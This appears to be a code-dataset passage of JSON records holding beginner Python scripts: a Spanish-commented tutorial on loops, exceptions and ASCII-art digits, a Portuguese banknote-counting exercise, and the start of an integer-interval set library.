Elemento\n print ('elemento de LISTA > ', Elemento, '\\n')\nelse : # cuando finalice el iterador\n print ('-- FIN DE LA LISTA --\\n')\n\nfor caracter in cadena : # iterador , bucle for in , pasa los caracteres de la cadena a la variable ; caracter\n if caracter == ' ' or caracter == '\\n': # condicion , si es un espacio en blanco o un salto de linea\n continue # vuelve al siguiente elemento de la secuencia\n if caracter in ['a', 'A', 'e', 'E', 'i', 'I', 'o', 'O', 'u', 'U'] : # condicion , si el valor esta en la lista \n print ('el caracter es una VOCAL > ', caracter, '\\n') # presenta el texto y su valor -vocal-\n else : # si no esta en la lista \n print ('el caracter es una CONSONANTE > ', caracter, '\\n') # presenta el texto y su valor -consonante- \nelse : # cuando finalice el iterador\n print ('-- FIN DE LA SECUENCIA DE LA CADENA --\\n') # presenta el texto\n\nprint ('control de excepciones -errores- con try / except\\n')\n\ntry : # control de excepciones\n 9 / 0 # division por cero -lanza excepcion-\nexcept ZeroDivisionError : # tipo de excepcion\n print ('** ERROR DIVISION POR CERO ** no se puede dividir por cero\\n') # presenta el texto\n \ntry : # control de excepciones\n 9 / 0 # division por cero -lanza excepcion-\nexcept ZeroDivisionError as Salida : # tipo de excepcion , pasa la salida de la excepcion a Salida\n print ('** ERROR DIVISION POR CERO ** no se puede dividir por cero\\n') # presenta el texto\n print (Salida, '\\n') # presenta la salida de la excepcion indicada\n\ntry : # control de excepciones\n 9 / 0 # division por cero -lanza excepcion-\nexcept : # tipo de excepcion general\n print ('** ERROR DIVISION POR CERO ** no se puede dividir por cero\\n') # presenta el texto\n \nprint ('operadores aritmeticos basicos ; + suma , - resta , * multiplicacion , / division\\n')\n\nprint ('suma\\n') # presenta el texto\n\nprint ('uno + seis ',uno + seis, '\\n' ) # presenta el texto y su valor -suma los valores-\n\nprint ('seis += 1\\n')\n\nseis += 1 # asignacion aumentada -suma 1 al valor de seis-\n\nprint ('seis ', seis, '\\n') # presenta el texto y su valor -7 , el valor de la variable mas el asignado mediante las suma-\n\nprint ('lista += \"suma\" ', '\\n' )\n\nlista += \"suma\" # añade los caracteres de la cadena a la lista\n\nprint ('lista ', lista, '\\n') # presenta el texto y su valor -la lista con los caracteres añadidos de la cadena\n\nprint ('lista + [\"suma\"] ',lista + [\"suma\"], '\\n' ) # presenta el texto y su valor -une las dos listas en una-\n\nprint ('cadena [ : -1] + cualquiera ',cadena [ : -1] + cualquiera, '\\n' ) # presenta el texto y su valor -une las dos cadenas en una-\n\nprint ('resta\\n') # presenta el texto\n\nprint ('seis - uno ',seis - uno, '\\n' ) # presenta el texto y su valor -resta los valores-\n\nprint ('seis ', seis, '\\n') # presenta el texto y su valor\n\nprint ('seis -= 1\\n')\n\nseis -= 1 # asignacion aumentada -resta 1 al valor de seis-\n\nprint ('seis ', seis, '\\n') # presenta el texto y su valor -5 , el valor de la variable mas el asignado mediante las resta-\n\nprint ('multiplicacion\\n') # presenta el texto\n\nprint ('seis * seis ',seis * seis, '\\n' ) # presenta el texto y su valor -multiplica los valores-\n\nprint ('seis *= 2\\n')\n\nseis *= 2 # asignacion aumentada -multiplica 2 al valor de seis-\n\nprint ('seis ', seis, '\\n') # presenta el texto y su valor -12 , el valor de la variable mas el asignado mediante la multiplicacion-\n\nprint ('lista *= 3 ', '\\n' )\n\nlista *= 3 # repite la lista tres veces\n\nprint ('lista ', lista, '\\n') # presenta el texto y su valor -la lista repetida tres veces-\n\nprint ('division\\n') # presenta el texto\n\nprint ('uno / seis ',uno / seis, '\\n' ) # presenta el texto y su valor -divide los valores-\n\nprint ('seis ', seis, '\\n') # presenta el texto y su valor\n\nprint ('seis /= 2\\n')\n\nseis /= 2 # asignacion aumentada -divide por 2 al valor de seis-\n\nprint ('seis ', seis, '\\n') # presenta el texto y su valor -3 , el valor de la variable mas el asignado mediante las division-\n\nprint ('teclee un numero entero seguido de enter o enter para salir\\n') # presenta el texto\n\ntotal = 0 # asigna valor int\n\ncontador = 0 # asigna valor int\n\nwhile True : # bucle while continuo\n entradaTeclado = input ('ENTERO :') # espera entrada teclado \n if entradaTeclado : # no es una cadena vacia\n try : # control de excepciones\n numero = int (entradaTeclado) # asigna un numero entero devuelto por int -cambia el formato cadena a digito-\n except ValueError as error : # tipo de excepcion , pasa la salida a error\n print ('tiene que ser un numero entero\\n') # presenta el texto \n print (error, '\\n') # presenta la salida de la excepcion indicada\n continue # vuelve al inicio del bucle while\n total += numero # suma el valor de numero al valor actual de total\n contador += 1 # suma uno al valor actual\n else : # es una cadena vacia\n break # interrumpe el bucle while\n \nif contador : # condicion , si es True -NO cero-\n print ('contador =', contador, 'total =', total, 'media =', total / contador, '\\n') # presenta los valores finales de contador , total y el resultado de su division\n \nprint ('entrada numeros enteros desde otro fichero , ejemplo ; capitulo1 < ficheo datos\\n') # presenta el texto\n\nTotal = 0 # asigna valor int\n\nContador = 0 # asigna valor int\n'''\nwhile True : # bucle while continuo\n EntradaTeclado = input () # espera entrada datos desde fichero externo \n if EntradaTeclado : # no es una cadena vacia\n try : # control de excepciones\n Numero = int (EntradaTeclado) # asigna un numero entero devuelto por int -cambia el formato cadena a digito-\n except ValueError as error : # tipo de excepcion , pasa la salida a error\n print ('tiene que ser un numero entero\\n') # presenta el texto \n print (error, '\\n') # presenta la salida de la excepcion indicada\n continue # vuelve al inicio del bucle while\n except EOFError : # tipo de excepcion , error fin de archivo -no contiene mas datos-\n break # interrumpe el bucle while\n Total += Numero # suma el valor de Numero al valor actual de Total\n Contador += 1 # suma uno al valor actual\n'''\nif Contador : # condicion , si es True -NO cero-\n print ('contador =', Contador, 'total =', Total, 'media =', Total / Contador, '\\n') # presenta los valores finales de contador , total y el resultado de su division\n\nprint ('entrada numeros enteros desde otro fichero -version bloques try / except anidados- , ejemplo ; capitulo1 < ficheo datos\\n') # presenta el texto\n\nTotal1 = 0 # asigna valor int\n\nContador1 = 0 # asigna valor int\n'''\nwhile True : # bucle while continuo\n try : # control de excepciones \n EntradaTeclado1 = input () # espera entrada datos desde fichero externo \n if EntradaTeclado1 : # no es una cadena vacia\n try : # control de excepciones anidado \n Numero1 = int (EntradaTeclado1) # asigna un numero entero devuelto por int -cambia el formato cadena a digito-\n except ValueError as error : # tipo de excepcion , pasa la salida a error\n print ('tiene que ser un numero entero\\n') # presenta el texto \n print (error, '\\n') # presenta la salida de la excepcion indicada\n continue # vuelve al inicio del bucle while\n Total1 += Numero1 # suma el valor de Numero1 al valor actual de Total1\n Contador1 += 1 # suma uno al valor actual \n except EOFError : # tipo de excepcion , error fin de archivo -no contiene mas datos-\n break # interrumpe el bucle while\n''' \nif Contador1 : # condicion , si es True -NO cero-\n print ('contador =', Contador1, 'total =', Total1, 'media =', Total1 / Contador1, '\\n') # presenta los valores finales de contador , total y el resultado de su division\n\nprint ('crear una funcion con def\\n')\n\ndef cogerEntero (mensaje) : # definicion de la funcion\n while True : # bucle while continuo\n try : # control de excepciones\n entrada = int (input(mensaje)) # asigna el argumento del parametro a input -mensaje entrada teclado- , int cambia el formato de cadena a digito de la entrada de teclado\n return entrada # devuelve mensaje presentado por la entrada de teclado\n except ValueError as Error : # tipo de excepcion , pasa la salida a Error\n print ('tiene que ser un numero entero\\n') # presenta el texto\n print (Error, '\\n') # presenta la salida de la excepcion indicada\n break # interrumpe el bucle\n \ncogerEntero ('ponga un numero ') # llama y ejecuta la funcion con el argumento indicado\n\nprint ('importar modulos mediante import\\n')\n\nprint ('nombre del programa ejecutado ', sys.argv, '\\n') # presenta el nombre del fichero llamado a ejecutar\n\n# importar modulo\n\nimport random # importa el modulo indicado\n\nfor x in range (5) : # iterador , bucle for in , pasa los elementos de la lista a ; x\n print (random.randint(1, 6), '\\n') # presenta un numero entero aleatorio en el rango indicado\nelse : # cuando finalice el iterador\n print ('-- FIN random --\\n') # presenta el texto\n\nfor X in range (5) : # iterador , bucle for in , pasa los elementos de la lista a ; X\n print (random.choice(['manzana', 'banana', 'platano', 'pera', 'queso', 'tomate']), '\\n') # presenta una cadena aleatoria de las indicadas en la lista\nelse : # cuando finalice el iterador\n print ('-- FIN random --\\n') # presenta el texto\n\nCERO = [' *** ', \n ' * * ', \n '* *', \n '* *', \n '* *',\n ' * * ',\n ' *** '] # lista -numero cero 0-\n\nUNO = [' * ', \n ' ** ', \n ' * ', \n ' * ', \n ' * ',\n ' * ',\n ' *** '] # lista -numero uno 1-\n \nDOS = [' *** ', \n ' **', \n ' **', \n ' ** ', \n '* ',\n '** ',\n ' **** '] # lista -numero dos 2-\n \nTRES = [' *** ', \n ' **', \n ' *', \n ' ****', \n ' *',\n ' **',\n ' *** '] # lista -numero tres 3-\n\nCUATRO = ['** *', \n '** *', \n '** *', \n '*******', \n ' **',\n ' **',\n ' **'] # lista -numero cuatro 4-\n \nCINCO = ['****** ',\n '** ', \n '** ', \n '***** ', \n ' **',\n ' **',\n '****** '] # lista -numero cinco 5-\n\nSEIS = [' **** ',\n '** ', \n '** ', \n '***** ', \n '** **',\n '** **',\n ' *** '] # lista -numero seis 6-\n\nSIETE = ['*******', \n '*******', \n ' **', \n ' ** ', \n ' ** ',\n ' ** ',\n ' ** '] # lista -numero siete 7-\n\nOCHO = [' *** ',\n '* *', \n ' * * ', \n ' *** ', \n ' * * ',\n '* *',\n ' *** '] # lista -numero ocho 8-\n\nNUEVE = [' ***** ', \n '* *', \n '* *', \n ' ***** ', \n ' ** ',\n ' ** ',\n ' ** '] # lista -numero nueve 9-\n\ndef numerosGrandes (numero) : # definicion de la funcion\n assert type (numero) == str, 'el argumento de numero tiene que ser un numero entero en formato cadena\\n' # regla de excepcion , si no se cumple lanza excepcion\n listaNumeros = [] # lista vacia , se asignan las listas de digitos que integran el parametro numero\n for digito in numero : # iterador , bucle for in , pasa los digitos a ; digito\n if digito == '0' : # condicion , si es igual al valor indicado\n listaNumeros.append (CERO) # añade la lista indicada a listaNumeros\n elif digito == '1' : # condicion , si es igual al valor indicado\n listaNumeros.append (UNO) # añade la lista indicada a listaNumeros\n elif digito == '2' : # condicion , si es igual al valor indicado\n listaNumeros.append (DOS) # añade la lista indicada a listaNumeros\n elif digito == '3' : # condicion , si es igual al valor indicado\n listaNumeros.append (TRES) # añade la lista indicada a listaNumeros\n elif digito == '4' : # condicion , si es igual al valor indicado\n listaNumeros.append (CUATRO) # añade la lista indicada a listaNumeros\n elif digito == '5' : # condicion , si es igual al valor indicado\n listaNumeros.append (CINCO) # añade la lista indicada a listaNumeros\n elif digito == '6' : # condicion , si es igual al valor indicado\n listaNumeros.append (SEIS) # añade la lista indicada a listaNumeros\n elif digito == '7' : # condicion , si es igual al valor indicado\n listaNumeros.append (SIETE) # añade la lista indicada a listaNumeros\n elif digito == '8' : # condicion , si es igual al valor indicado\n listaNumeros.append (OCHO) # añade la lista indicada a listaNumeros\n elif digito == '9' : # condicion , si es igual al valor indicado\n listaNumeros.append (NUEVE) # añade la lista indicada a listaNumeros\n numeroDigitos = range (len(listaNumeros)) # devuelve una lista de numeros con el numero de elementos de la lista -cero al penultimo elemento- \n for POSICION in range (7) : # iterador , bucle for in , pasa los elementos de la lista a ; POSICION -posicion de la lista-\n for columna in numeroDigitos : # iterador , bucle for in , pasa los elementos de la lista a ; columna -NUMERO-\n if columna == 0 : # condicion , asigna la lista de la posicion 0 -columna- y su indice -POSICION- de listaNumeros\n DIGITOS = listaNumeros [columna] [POSICION] + ' ' # asigna el elemento de sublista y posicion indicada \n if columna != 0 : # condicion , las siguientes columnas se añaden de listaNumeros\n DIGITOS += listaNumeros [columna] [POSICION] + ' ' # añade las siguientes sublistas y posiciones de listaNumeros\n print (DIGITOS) # presenta los elementos de las sublistas con las misma posicion en una sola linea -cadena-\n else : # cuando finalice el iterador \n print ('\\n') # salto de linea\n\nnumerosGrandes ('1015') # llama y ejecuta la funcion con el argumento indicado\n\nnumerosGrandes ('0123456789') # llama y ejecuta la funcion con el argumento indicado\n\ndef cuadriculaNumerosAleatorios (columnas, lineas, valorMaximo) : # definicion de la funcion\n assert type (columnas) == int, 'columnas debe ser un numero entero\\n' # regla de excepcion , si no se cumple lanza excepcion\n assert type (lineas) == int, 'lineas debe ser un numero entero\\n' # regla de excepcion , si no se cumple lanza excepcion\n assert type (valorMaximo) == int, 'valorMaximo debe ser un numero entero\\n' # regla de excepcion , si no se cumple lanza excepcion\n numerosAleatorios = [] # lista vacia , añade los numeros aleatorios devueltos por random.randint\n lineaAleatorios = '' # cadena vacia , añade los numeros aleatorios en formato cadena\n for linea in range(lineas) : # iterador , bucle for in , pasa los elementos de la lista a ; linea -numero de lineas de numeros aleatorios a presentar-\n contador = 0 # cuenta el numero de columnas añadidas a la linea de numeros aleatorios\n while True : # bucle while continuo\n aleatorio = random.randint(1, valorMaximo) # devuelve un numero entero aleatorio dentro del rango indicado -1 al valor de valorMaximo-\n if aleatorio in numerosAleatorios : # condicion , si el numero aleatorio esta en la lista \n continue # vuelve al inicio del bucle while -genera otro numero aleatorio-\n else : # si no esta en la lista\n numerosAleatorios.append (aleatorio) # lo añade a la lista de numeros aleatorios\n if not lineaAleatorios : # condicion , si la cadena esta vacia \n lineaAleatorios = str (aleatorio) + ' ' # asigna el numero aleatorio en formato cadena mas un espacio en blanco\n else : # si la cadena no esta vacia\n lineaAleatorios += str (aleatorio) + ' ' # añade el siguiente numero aleatorio en formato cadena mas un espacio en blanco\n contador += 1 # suma uno al valor actual de contador \n if contador == columnas : # condicion , si el valor es igual al de las columnas de la linea de numeros aleatorios \n print (lineaAleatorios) # presenta una linea de numeros aleatorios -NO REPETIDOS- en formato cadena \n lineaAleatorios = '' # asigna una cadena vacia de nuevo a lineaAleatorios , para la siguiente linea\n break # interrumpe el bucle while continuo para iterar la siguiente linea de numeros aleatorios\n else : # cuando finalice el iterador\n print ('\\n-- FIN CUADRICULA NUMEROS ALEATORIOS --\\n') # presenta el texto\n\ncuadriculaNumerosAleatorios (5, 5, 100) # llama y ejecuta la funcion con el argumento indicado\n\ncuadriculaNumerosAleatorios (10, 10, 100) # llama y ejecuta la funcion con el argumento indicado\n\ndef numerosGrandes1 (numero) : # definicion de la funcion\n assert type (numero) == str, 'el argumento de numero tiene que ser un numero entero en formato cadena\\n' # regla de excepcion , si no se cumple lanza excepcion\n listaNumeros = [] # lista vacia , se asignan las listas de digitos que integran el parametro numero\n for digito in numero : # iterador , bucle for in , pasa los digitos a ; digito\n if digito == '0' : # condicion , si es igual al valor indicado\n listaNumeros.append (CERO) # añade la lista indicada a listaNumeros\n elif digito == '1' : # condicion , si es igual al valor indicado\n listaNumeros.append (UNO) # añade la lista indicada a listaNumeros\n elif digito == '2' : # condicion , si es igual al valor indicado\n listaNumeros.append (DOS) # añade la lista indicada a listaNumeros\n elif digito == '3' : # condicion , si es igual al valor indicado\n listaNumeros.append (TRES) # añade la lista indicada a listaNumeros\n elif digito == '4' : # condicion , si es igual al valor indicado\n listaNumeros.append (CUATRO) # añade la lista indicada a listaNumeros\n elif digito == '5' : # condicion , si es igual al valor indicado\n listaNumeros.append (CINCO) # añade la lista indicada a listaNumeros\n elif digito == '6' : # condicion , si es igual al valor indicado\n listaNumeros.append (SEIS) # añade la lista indicada a listaNumeros\n elif digito == '7' : # condicion , si es igual al valor indicado\n listaNumeros.append (SIETE) # añade la lista indicada a listaNumeros\n elif digito == '8' : # condicion , si es igual al valor indicado\n listaNumeros.append (OCHO) # añade la lista indicada a listaNumeros\n elif digito == '9' : # condicion , si es igual al valor indicado\n listaNumeros.append (NUEVE) # añade la lista indicada a listaNumeros\n numeroDigitos = range (len(listaNumeros)) # devuelve una lista de numeros con el numero de elementos de la lista -cero al penultimo elemento- \n for POSICION in range (7) : # iterador , bucle for in , pasa los elementos de la lista a ; POSICION -posicion de la lista-\n for columna in numeroDigitos : # iterador , bucle for in , pasa los elementos de la lista a ; columna -NUMERO-\n if numero [columna] == '0' : # condicion , si coincide la posicion de la cadena con el digito indicado\n valorColumna = '0' # asigna el digito en formato cadena\n elif numero [columna] == '1' : # condicion , si coincide la posicion de la cadena con el digito indicado\n valorColumna = '1' # asigna el digito en formato cadena \n elif numero [columna] == '2' : # condicion , si coincide la posicion de la cadena con el digito indicado\n valorColumna = '2' # asigna el digito en formato cadena\n elif numero [columna] == '3' : # condicion , si coincide la posicion de la cadena con el digito indicado\n valorColumna = '3' # asigna el digito en formato cadena\n elif numero [columna] == '4' : # condicion , si coincide la posicion de la cadena con el digito indicado\n valorColumna = '4' # asigna el digito en formato cadena\n elif numero [columna] == '5' : # condicion , si coincide la posicion de la cadena con el digito indicado\n valorColumna = '5' # asigna el digito en formato cadena\n elif numero [columna] == '6' : # condicion , si coincide la posicion de la cadena con el digito indicado\n valorColumna = '6' # asigna el digito en formato cadena\n elif numero [columna] == '7' : # condicion , si coincide la posicion de la cadena con el digito indicado\n valorColumna = '7' # asigna el digito en formato cadena\n elif numero [columna] == '8' : # condicion , si coincide la posicion de la cadena con el digito indicado\n valorColumna = '8' # asigna el digito en formato cadena \n elif numero [columna] == '9' : # condicion , si coincide la posicion de la cadena con el digito indicado\n valorColumna = '9' # asigna el digito en formato cadena\n cambiarAsteriscos = '' # asigna una cadena vacia \n for DIGITO in listaNumeros [columna] [POSICION] : # iterador , bucle for in , pasa los elementos de la cadena a ; DIGITO\n if DIGITO == '*' : # condicion , si la subcadena es un asterisco\n if not cambiarAsteriscos : # condicion , si la cadena esta vacia\n cambiarAsteriscos = valorColumna # asigna el valor correspondiente -digito en formato cadena-\n continue # vuelve al siguiente elemento de la cadena\n else : # si la cadena NO esta vacia\n cambiarAsteriscos += valorColumna # añade el valor valor correspondiente -digito en formato cadena- a la cadena\n continue # vuelve al siguiente elemento de la cadena\n cambiarAsteriscos += DIGITO # añade el valor valor correspondiente -la subcadena de la cadena- a la cadena (no lo cambia al no ser un asterisco) \n if columna == 0 : # condicion , si es la primera columna -cadena- , asigna la cadena a la variable \n DIGITOS = cambiarAsteriscos + ' ' # asigna la nueva cadena modificada -los asteriscos cambiados por el digito correspondiente- mas el espacio en blanco \n if columna != 0 : # condicion , si no es la primera columna -cadena- las siguientes cadenas se añaden consecutivas\n DIGITOS += cambiarAsteriscos + ' ' # añade la nueva cadena modificada -los asteriscos cambiados por el digito correspondiente- mas el espacio en blanco \n print (DIGITOS) # presenta los elementos de las sublistas con las misma posicion en una sola linea -cadena-\n else : # cuando finalice el iterador \n print ('\\n') # salto de linea\n\nnumerosGrandes1 ('1015') # llama y ejecuta la funcion con el argumento indicado\n\nnumerosGrandes1 ('0123456789') # llama y ejecuta la funcion con el argumento indicado\n\ndef calcular () : # definicion de la funcion \n listaDEnumeros = [] # lista vacia , se añaden los numeros introducidos\n while True : # bucle while continuo\n entrada_Teclado = input ('introduzca un numero y pulse enter -salir solo enter- ') # espera entrada teclado\n if not entrada_Teclado : # condicion , si es una cadena vacia\n if not listaDEnumeros : # condicion , si la lista esta vacia\n print ('lista vacia', listaDEnumeros, '\\n') # presenta la cadena y su valor -lista vacia-\n break # interrumpe el bucle while\n listaOrdenada = sorted (listaDEnumeros) # ordena la lista\n suma = 0 # asigna valor int \n for x in listaDEnumeros : # iterador , bucle for in , pasa los elementos de la lista a ; x \n suma += x # suma el valor de x al valor actual de suma -suma todos los numeros de la lista-\n print ('numeros introducidos : ', listaDEnumeros, '\\n') # presenta la cadena y su valor -lista de numeros introducidos-\n print ('cantidad de numeros introducidos : {} , suma total numeros : {} , numero mas bajo : {} , numero mas alto : {} , media : {}\\n'.format (len(listaDEnumeros), suma, listaOrdenada[0],listaOrdenada[-1], suma / len(listaDEnumeros))) # presenta la cadena formateada y sus valores\n break # interrumpe el bucle while\n listaDEnumeros.append (int(entrada_Teclado)) # añade los numeros a la lista\n\n\ncalcular () # llama y ejecuta la funcion \n\ndef frasesAleatorias (numeroLineas=5) : # definicion de la funcion \n if numeroLineas > 10 : # condicion , si es mas del numero indicado\n numeroLineas = 10 # asigna el numero maximo \n articulos = ['el','la', 'los', 'ella', 'ellos', 'nosotros', 'vosotros', 'yo'] # asigna la lista de articulos\n sujetos = ['hombre', 'hombres', 'mujer', 'mujeres', 'niño', 'niños', 'perro', 'gato'] # asigna la lista de sujetos\n adverbios = ['tranquilo', 'nervioso', 'alto', 'bajo', 'delgado', 'grueso', 'joven', 'viejo'] # asigna la lista de adverbios\n verbos = ['correr', 'parar', 'subir', 'bajar', 'coger', 'dejar', 'hablar', 'callar', 'pensar', 'dormir'] # asigna la lista de verbos\n for bucle in range (numeroLineas) : # iterador , bucle for in , pasa los elementos de la lista a ; bucle -numero de lineas aleatorias-\n articulo = random.choice (articulos) # selecciona una de las cadenas de la lista indicada\n sujeto = random.choice (sujetos) # selecciona una de las cadenas de la lista indicada\n adverbio = random.choice (adverbios) # selecciona una de las cadenas de la lista indicada\n verbo = random.choice (verbos) # selecciona una de las cadenas de la lista indicada\n tipoFrase = random.randint (1, 2) # selecciona uno de los dos numeros\n if tipoFrase == 1 : # condicion , si el numero es el indicado\n print (articulo + ' ' + sujeto + ' ' + verbo + ' ' + adverbio) # presenta una frase completa\n else : # numero 2\n print (articulo + ' ' + sujeto + ' ' + verbo) # presenta una frase sin adverbio\n else : # cuando finalice el iterador\n print ('\\n') # salto de linea\n\nfrasesAleatorias () # llama y ejecuta la funcion sin argumento\n\nfrasesAleatorias (6) # llama y ejecuta la funcion con el argumento indicado\n\nfrasesAleatorias (8) # llama y ejecuta la funcion con el argumento indicado \n\nfrasesAleatorias (9) # llama y ejecuta la funcion con el argumento indicado \n\nfrasesAleatorias (10) # llama y ejecuta la funcion con el argumento indicado \n\nfrasesAleatorias (12) # llama y ejecuta la funcion con el argumento indicado \n\ndef calcular1 () : # definicion de la funcion \n listaDEnumeros = [] # lista vacia , se añaden los numeros introducidos\n while True : # bucle while continuo\n entrada_Teclado = input ('introduzca un numero y pulse enter -salir solo enter- ') # espera entrada teclado\n if not entrada_Teclado : # condicion , si es una cadena vacia\n if not listaDEnumeros : # condicion , si la lista esta vacia\n print ('lista vacia', listaDEnumeros, '\\n') # presenta la cadena y su valor -lista vacia-\n break # interrumpe el bucle while\n menor = None # asigna el numero menor\n mayor = None # asigna el numero mayor \n for bucle in range (len(listaDEnumeros)) : # iterador , bucle for in , pasa los elementos de la lista a ; bucle -numero de veces que ordena la lista-\n for posicion, numero in enumerate (listaDEnumeros) : # iterador , bucle for in , pasa los elementos de la lista a ; numero , enumerate () numera los elementos de la lista\n posicionSiguiente = posicion + 1 # posicion siguiente\n if posicionSiguiente == len (listaDEnumeros) : # condicion , si el valor es igual al numero de elementos de la lista\n break # interrumpe el bucle\n if numero > listaDEnumeros [posicionSiguiente] : # condicion , si el numero es mayor que el siguiente\n menor = listaDEnumeros [posicionSiguiente] # asigna el numero menor \n mayor = numero # asigna el numero mayor\n listaDEnumeros [posicion] = menor # asigna el valor menor a la posicion actual de la lista \n listaDEnumeros [posicionSiguiente] = mayor # asigna el valor mayor a la posicion siguiente de la lista\n suma = 0 # asigna valor int\n for x in listaDEnumeros : # iterador , bucle for in , pasa los elementos de la lista a ; x \n suma += x # suma el valor de x al valor actual de suma -suma todos los numeros de la lista-\n print ('numeros introducidos : ', listaDEnumeros, '\\n') # presenta la cadena y su valor -lista de numeros introducidos-\n if len (listaDEnumeros) % 2 == 0 : # condicion , si el numero de elementos es par\n izquierda = listaDEnumeros [ : int(len (listaDEnumeros) / 2)] # asigna la subcadena desde inicio a la posicion indicada -posicion par-\n derecha = listaDEnumeros [int(len (listaDEnumeros) / 2) : ] # asigna la subcadena desde la posicion indicada -posicion par- al final de la lista \n sumaIzquierda = 0 # asigna la suma total de la subcadena izquierda\n for sumaI in izquierda : # iterador , bucle for in , pasa los elementos de la lista a ; sumaI\n sumaIzquierda += sumaI # suma el valor indicado al valor actual\n sumaDerecha = 0 # asigna la suma total de la subcadena derecha\n for sumaD in derecha : # iterador , bucle for in , pasa los elementos de la lista a ; sumaD\n sumaDerecha += sumaD # suma el valor indicado al valor actual\n media = ((sumaIzquierda / len (izquierda)) + (sumaDerecha / len (derecha))) / 2 # asigna el resultado de las medias de las dos subcadenas\n else : # si el numero de elementos es inpar\n media = suma / len(listaDEnumeros) # asigna el valor medio del resultado\n print ('cantidad de numeros introducidos : {} , suma total numeros : {} , numero mas bajo : {} , numero mas alto : {} , media : {}\\n'.format (len(listaDEnumeros), suma, listaDEnumeros[0],listaDEnumeros[-1], media)) # presenta la cadena formateada y sus valores\n break # interrumpe el bucle while\n listaDEnumeros.append (int(entrada_Teclado)) # añade los numeros a la lista\n\ncalcular1 () # llama y ejecuta la funcion sin argumento\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"jvpb/PYTHON3","sub_path":"CAPITULO1/capitulo1.py","file_name":"capitulo1.py","file_ext":"py","file_size_in_byte":44515,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"10912786543","text":"# 100, 50, 20, 10, 5, 2, 1\r\nbanco = int(input(\"Valor sacar: \"))\r\n\r\nnota_100, nota_50, nota_20, nota_10, nota_5, nota_2, nota_1 = 0, 0, 0, 0, 0, 0, 0\r\n\r\nnotas = [0, 0, 0, 0, 0, 0, 0]\r\n\r\nwhile banco > 0:\r\n if banco % 100 == 0:\r\n notas[0] += 1\r\n banco -= 100\r\n\r\n elif banco % 50 == 0: \r\n notas[1] += 1\r\n banco -= 50\r\n\r\n elif banco % 20 == 0:\r\n notas[2] += 1\r\n banco -= 20\r\n\r\n elif banco % 10 == 0: \r\n notas[3] += 1\r\n banco -= 10\r\n\r\n elif banco % 5 == 0:\r\n notas[4] += 1\r\n banco -= 5\r\n \r\n elif banco % 2 == 0:\r\n notas[5] += 1\r\n banco -= 2\r\n \r\n elif banco % 1 == 0:\r\n notas[6] += 1\r\n banco -= 1\r\n\r\nprint(f\"Você pode sacar combinando {notas[0]} de 100 | {notas[1]} de 50 | {notas[2]} de 20 | {notas[3]} de 10 | {notas[4]} de 5 | {notas[5]} nota de 2 | {notas[6]} de 1\")\r\n","repo_name":"Gbrvi/UENF","sub_path":"PROG1/C/Banco/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"33729506493","text":"import operator as _operator\n\n\nclass ProcInt(tuple):\n \"\"\"A ProcInt is a closed interval of non-negative integers.\"\"\"\n\n __slots__ = ()\n\n __NEW_SENTINEL = object() # sentinel for optional sup\n\n def __new__(cls, inf, sup=__NEW_SENTINEL):\n \"\"\"Create new instance of ProcInt(inf, sup).\"\"\"\n if not isinstance(inf, int):\n raise TypeError('{}() argument inf must be int'.format(cls.__name__))\n if sup is cls.__NEW_SENTINEL:\n sup = inf\n if not isinstance(sup, int):\n raise TypeError('{}() argument sup must be int'.format(cls.__name__))\n if inf > sup:\n raise ValueError('Invalid interval bounds')\n if inf < 0:\n raise ValueError('Invalid negative bound(s)')\n return tuple.__new__(cls, (inf, sup))\n\n def __getnewargs__(self):\n return tuple(self)\n\n def __repr__(self):\n \"\"\"Return a nicely formatted representation string.\"\"\"\n return '{}(inf={!r}, sup={!r})'.format(type(self).__name__, *self)\n\n def __str__(self):\n return format(self)\n\n def __format__(self, format_spec):\n if len(format_spec) > 1:\n raise ValueError('Invalid format specifier')\n if self.inf == self.sup:\n return str(self.inf)\n insep = format_spec or '-'\n return insep.join(map(str, self))\n\n def __len__(self):\n return self.sup - self.inf + 1\n\n def __contains__(self, item):\n return self.inf <= item <= self.sup\n\n inf = property(_operator.itemgetter(0), doc='Alias for field number 0')\n\n sup = property(_operator.itemgetter(1), doc='Alias for field number 1')\n\n\nclass _Sentinel:\n \"\"\"Helper class whose instances are greater than any object.\"\"\"\n\n __slots__ = ()\n\n def __eq__(self, other):\n return self is other\n\n def __lt__(self, other):\n return False\n\n __le__ = __eq__\n\n def __gt__(self, other):\n return True\n\n __ge__ = __gt__\n\n\nclass ProcSet:\n \"\"\"\n Set of non-overlapping (i.e., disjoint) non-negative integer intervals.\n \"\"\"\n\n __slots__ = ('_itvs', )\n\n def __init__(self, *intervals):\n \"\"\"\n A ProcSet can be initialized with either nothing (empty set), any\n number of non-negative integer, any number of :class:`ProcInt`-compatible\n iterable (iterable of exactly two :class:`int`), any number of ProcSet,\n or any combination of such objects.\n\n The resulting ProcSet is the union of all the intervals passed to the\n constructor.\n There is no restriction on the domains of the intervals passed to the\n constructor: the domains may overlap.\n \"\"\"\n self._itvs = [] # list of disjoint intervals, in increasing order\n for new_itvs in map(self._as_itvs, intervals):\n self._itvs = list(self._merge(self._itvs, new_itvs, _operator.or_))\n\n @classmethod\n def from_str(cls, string, insep=\"-\", outsep=\" \"):\n \"\"\"\n Build a ProcSet from a string representation of an interval set.\n The parsed string need not to be in canonical form.\n\n :param str string: \\\n string representation to parse\n :param str insep: \\\n delimiter character between the boundaries of a single interval\n (defaults to ``-``, ascii dash symbol ``0x2d``)\n :param str outsep: \\\n delimiter character between two intervals\n (defaults to ``␣``, ascii space symbol ``0x20``)\n \"\"\"\n if not isinstance(string, str):\n raise TypeError(\n 'from_str() argument 2 must be str, not {}'.format(type(string).__name__)\n )\n\n # empty string is parsed as empty ProcSet\n if not string:\n return cls()\n\n try:\n raw_bounds = (\n map(int, itv.split(sep=insep, maxsplit=1))\n for itv in string.split(sep=outsep)\n )\n intervals = (ProcInt(*bounds) for bounds in raw_bounds)\n return cls(*intervals)\n except ValueError:\n raise ValueError(\n 'Invalid interval format, parsed string is: \\'{}\\''.format(string)\n ) from None\n\n def __str__(self):\n return format(self)\n\n def __format__(self, format_spec):\n if format_spec:\n try:\n insep, outsep = format_spec\n except ValueError:\n raise ValueError('Invalid format specifier') from None\n else:\n insep, outsep = '- '\n\n return outsep.join(format(itv, insep) for itv in self._itvs)\n\n def 